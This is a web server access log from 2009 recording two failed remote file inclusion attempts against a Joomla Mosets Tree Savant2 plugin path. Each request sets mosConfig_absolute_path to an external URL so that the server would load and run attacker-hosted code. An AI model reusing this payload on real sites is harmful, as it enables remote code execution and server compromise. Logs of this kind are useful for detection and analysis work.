69.175.12.226 - - [27/Sep/2009:23:32:37 -0700] "GET /logs/access.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.198.6.113 - - [27/Sep/2009:23:33:15 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
